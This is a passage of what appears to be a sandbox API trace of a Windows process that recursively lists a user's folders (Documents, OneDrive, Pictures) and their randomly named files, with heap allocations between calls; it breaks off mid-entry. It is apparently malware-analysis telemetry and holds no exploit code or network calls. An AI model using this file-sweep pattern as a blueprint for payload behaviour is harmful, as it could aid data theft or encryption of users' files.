lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd0e1670, ftCreationTime.dwHighDateTime=0x1d8a0c5, ftLastAccessTime.dwLowDateTime=0x8a280af0, ftLastAccessTime.dwHighDateTime=0x1d8a6ae, ftLastWriteTime.dwLowDateTime=0x8a280af0, ftLastWriteTime.dwHighDateTime=0x1d8a6ae, nFileSizeHigh=0x0, nFileSizeLow=0x15f44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tRcMqrNBqTUs.mp3", cAlternateFileName="TRCMQR~1.MP3")) returned 1 [0175.545] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 1 [0175.545] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 0 [0175.545] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.545] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.545] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\My Documents\\") returned="My Documents\\" [0175.545] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.545] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.545] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.545] PathFindFileNameW (pszPath="") returned="" [0175.546] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\My Documents\\*" (normalized: "c:\\users\\keecfmwgj\\my documents\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 0xffffffff [0175.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0175.546] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.546] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\NetHood\\") returned="NetHood\\" [0175.546] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.546] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.546] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.546] PathFindFileNameW (pszPath="") returned="" [0175.547] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\NetHood\\*" (normalized: "c:\\users\\keecfmwgj\\nethood\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 0xffffffff [0175.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.547] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.547] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\") returned="OneDrive\\" [0175.547] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.547] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.547] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.547] PathFindFileNameW (pszPath="") returned="" [0175.547] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\*" (normalized: "c:\\users\\keecfmwgj\\onedrive\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.549] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.549] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.549] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0175.549] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.549] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.549] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0175.549] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.549] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.549] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.550] PathFindFileNameW (pszPath="") returned="" [0175.550] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98f436d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98f436d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98f436d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98f436d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9109a900, ftCreationTime.dwHighDateTime=0x1d896eb, ftLastAccessTime.dwLowDateTime=0xc0cd6ac0, ftLastAccessTime.dwHighDateTime=0x1d8a53f, ftLastWriteTime.dwLowDateTime=0xc0cd6ac0, ftLastWriteTime.dwHighDateTime=0x1d8a53f, nFileSizeHigh=0x0, nFileSizeLow=0x5083, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="141isvJREPi.gif", cAlternateFileName="141ISV~1.GIF")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x889c5f50, ftCreationTime.dwHighDateTime=0x1d8a173, ftLastAccessTime.dwLowDateTime=0x62799ba0, ftLastAccessTime.dwHighDateTime=0x1d8a2ca, ftLastWriteTime.dwLowDateTime=0x62799ba0, ftLastWriteTime.dwHighDateTime=0x1d8a2ca, nFileSizeHigh=0x0, nFileSizeLow=0x1513f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8jMjrpIb7p7V7JGa.png", cAlternateFileName="8JMJRP~1.PNG")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5563dbf0, ftCreationTime.dwHighDateTime=0x1d8a2f3, ftLastAccessTime.dwLowDateTime=0x333cc4b0, ftLastAccessTime.dwHighDateTime=0x1d8a5af, ftLastWriteTime.dwLowDateTime=0x333cc4b0, ftLastWriteTime.dwHighDateTime=0x1d8a5af, nFileSizeHigh=0x0, nFileSizeLow=0x16b61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9p8OG.bmp", cAlternateFileName="")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86a755d0, ftCreationTime.dwHighDateTime=0x1d89ef1, ftLastAccessTime.dwLowDateTime=0xcf7c06d0, ftLastAccessTime.dwHighDateTime=0x1d8a4fe, ftLastWriteTime.dwLowDateTime=0xcf7c06d0, ftLastWriteTime.dwHighDateTime=0x1d8a4fe, nFileSizeHigh=0x0, nFileSizeLow=0x154b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a8cSBpx3PB.jpg", cAlternateFileName="A8CSBP~1.JPG")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96a20590, ftCreationTime.dwHighDateTime=0x1d8a471, ftLastAccessTime.dwLowDateTime=0xed101870, ftLastAccessTime.dwHighDateTime=0x1d8a563, ftLastWriteTime.dwLowDateTime=0xed101870, ftLastWriteTime.dwHighDateTime=0x1d8a563, nFileSizeHigh=0x0, nFileSizeLow=0xe4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lv6DMrgKbM_9C6x.jpg", cAlternateFileName="LV6DMR~1.JPG")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6e7ff40, ftCreationTime.dwHighDateTime=0x1d89e6a, ftLastAccessTime.dwLowDateTime=0xc88c1aa0, ftLastAccessTime.dwHighDateTime=0x1d8a3db, ftLastWriteTime.dwLowDateTime=0xc88c1aa0, ftLastWriteTime.dwHighDateTime=0x1d8a3db, nFileSizeHigh=0x0, nFileSizeLow=0x1746e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ncx1xStIYX_cZWb.gif", cAlternateFileName="NCX1XS~1.GIF")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56953840, ftCreationTime.dwHighDateTime=0x1d8a1fc, ftLastAccessTime.dwLowDateTime=0xfe260f00, ftLastAccessTime.dwHighDateTime=0x1d8a50b, ftLastWriteTime.dwLowDateTime=0xfe260f00, ftLastWriteTime.dwHighDateTime=0x1d8a50b, nFileSizeHigh=0x0, nFileSizeLow=0xa6ca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nIFn.gif", cAlternateFileName="")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d0060, ftCreationTime.dwHighDateTime=0x1d89a96, ftLastAccessTime.dwLowDateTime=0xe5600b80, ftLastAccessTime.dwHighDateTime=0x1d89de8, ftLastWriteTime.dwLowDateTime=0xe5600b80, ftLastWriteTime.dwHighDateTime=0x1d89de8, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NThXrLNnKw.gif", cAlternateFileName="NTHXRL~1.GIF")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00212c0, ftCreationTime.dwHighDateTime=0x1d89e12, ftLastAccessTime.dwLowDateTime=0xbfa089d0, ftLastAccessTime.dwHighDateTime=0x1d8a129, ftLastWriteTime.dwLowDateTime=0xbfa089d0, ftLastWriteTime.dwHighDateTime=0x1d8a129, nFileSizeHigh=0x0, nFileSizeLow=0xe68f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V89DayYK-6YpvEr4NY.gif", cAlternateFileName="V89DAY~1.GIF")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b98a340, ftCreationTime.dwHighDateTime=0x1d8a072, ftLastAccessTime.dwLowDateTime=0x2fb77630, ftLastAccessTime.dwHighDateTime=0x1d8a6ba, ftLastWriteTime.dwLowDateTime=0x2fb77630, ftLastWriteTime.dwHighDateTime=0x1d8a6ba, nFileSizeHigh=0x0, nFileSizeLow=0xb2ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WZMKMOpOZYAgO-UJTDf.bmp", cAlternateFileName="WZMKMO~1.BMP")) returned 1 [0175.550] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 1 [0175.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0175.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0175.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0175.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0175.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0175.551] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 0 [0175.551] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d28008 | out: hHeap=0x6a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0175.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0175.552] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0175.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: 